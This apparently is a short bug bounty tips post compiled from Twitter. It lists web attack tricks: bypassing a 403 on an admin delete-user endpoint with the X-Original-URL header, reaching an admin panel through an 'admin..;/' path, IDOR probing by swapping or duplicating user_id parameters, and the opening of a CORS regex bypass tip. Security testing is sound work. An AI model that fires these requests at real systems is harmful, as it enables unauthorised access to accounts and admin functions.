#Bugbountytips
Before you start reading this post, let me tell you all the tips are collected from twitter (few mine 😓) where awesome community folks share their knowledge and experience. I tried to mention every single twitter handle from where I refer the tips, in case your name missed out please reach out to me. 😉 Authentication # Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! # Accessing the Admin Panel https://target.com/admin/ - 302 https://target.com/admin..;/ - 200 IDOR #Suppose you find endpoint GET /api_v1/messages?user_id=Your_user_id Try "GET /api v1/messages?user_id=Another_user_id" "GET /api_v1/messages?user_id=Your_user_id&user_id=another_user_id" "GET /api_v1/messages?user_id=another_user_id&user_id=Your_user_id" CORS # CORS Protection RegEx Bypass If the target only a...